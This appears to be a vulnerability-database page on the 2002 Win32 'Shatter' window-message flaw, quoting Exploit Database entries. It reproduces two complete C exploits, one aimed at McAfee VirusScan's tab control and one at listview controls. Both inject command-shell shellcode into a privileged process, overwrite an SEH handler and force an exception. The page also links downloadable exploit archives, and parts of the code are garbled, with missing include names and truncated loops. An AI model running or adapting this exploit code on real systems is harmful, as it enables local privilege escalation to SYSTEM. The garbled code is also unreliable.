// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /********************************************************** * Tab Control Shatter exploit for McAfee A/V products * (or any other program that includes a tab control) * * Demonstrates the use of tab control messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 3 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * * Hardcoded addresses are for XP SP 1 * Try it out against any program with a tab control. * Oliver Lavery * * Based on (and pretty much identical to) shatterseh2.c by * Brett Moore [ brett moore security-assessment com ] **********************************************************/ #include #include #include // Local Cmd Shellcode. // Added a loadLibrary call to make sure msvcrt.dll is present -- ol BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="VirusScan Status";// The name of the main window long sehHandler = 0x77edXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x77ed7484; // Known Writeable Space Or Global Space // you might want to find a less destructive spot to stick the code, but this works for me --ol void doWrite(HWND hWnd, long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with tabcontrol messages\n"); printf("%% Oliver Lavery.\n\n"); printf("%% based on Shatter SEH code by\n"); printf("%% brett moore security-assessment com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Not Done...\n"); return 0; } void doWrite(HWND hWnd, long tByte,long address) { SendMessage( hWnd,(UINT) TCM_SETITEMSIZE,0,MAKELPARAM(tByte - 2, 20)); SendMessage( hWnd,(UINT) TCM_GETITEMRECT,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); while ( strcmp(g_classNameBuf, "SysTabControl32") ) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); } if(childhWnd != NULL) { LONG wndStyle = GetWindowLong( (HWND)childhWnd, GWL_STYLE ); wndStyle |= TCS_FIXEDWIDTH ; SetWindowLong( (HWND)childhWnd, GWL_STYLE, wndStyle ); printf("min %d\n", SendMessage( (HWND)childhWnd,(UINT) TCM_SETMINTABWIDTH, 0,(LPARAM)0) ); printf("+ Found tab control..0x%xh\n",childhWnd); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper> 8) & 0xff),sehHandler+1); doWrite((HWND)childhWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)childhWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) childhWnd,(UINT) TCM_GETITEMRECT,0,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21689

Publication date : 2002-08-05 22:00 +00:00
Author : Brett Moore
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /********************************************************** * shatterseh2.c * * Demonstrates the use of listview messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 3 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * The 'autofind' feature may not work against all programs. * Insert your own blank lines for readability * Try it out against any program with a listview. * eg: explorer, IE, any file open dialog * Brett Moore [ brett.moore@security-assessment.com ] * www.security-assessment.com **********************************************************/ #include #include // Local Cmd Shellcode BYTE exploit[] = "\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc"; long hLVControl,hHdrControl; char tWindow[]="Main Window Title";// The name of the main window long sehHandler = 0x77edXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x0045e000; // Known Writeable Space Or Global Space void doWrite(long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with listview messages\n"); printf("%% brett.moore@security-assessment.com\n\n"); // Find local procedure address hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[8] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Not Done...\n"); return 0; } void doWrite(long tByte,long address) { SendMessage((HWND) hLVControl,(UINT) LVM_SETCOLUMNWIDTH, 0,MAKELPARAM(tByte, 0)); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = GetNextWindow(hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = GetNextWindow(childhWnd ,GW_HWNDNEXT); } hLVControl = hWnd; hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0); if(hHdrControl != NULL) { // Found a Listview Window with a Header printf("+ Found listview window..0x%xh\n",hLVControl); printf("+ Found lvheader window..0x%xh\n",hHdrControl); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper> 8) & 0xff),sehHandler+1); doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21690

Publication date : 2002-08-05 22:00 +00:00
Author : Ovidio Mallo
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21690.rar
Exploit Database EDB-ID : 21691

Publication date : 2002-08-05 22:00 +00:00
Author : anonymous
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21691.zip

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

References

http://www.ciac.org/ciac/bulletins/n-027.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.securityfocus.com/bid/5927
Tags : vdb-entry, x_refsource_BID
http://getad.chat.ru/
Tags : x_refsource_MISC

More information
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.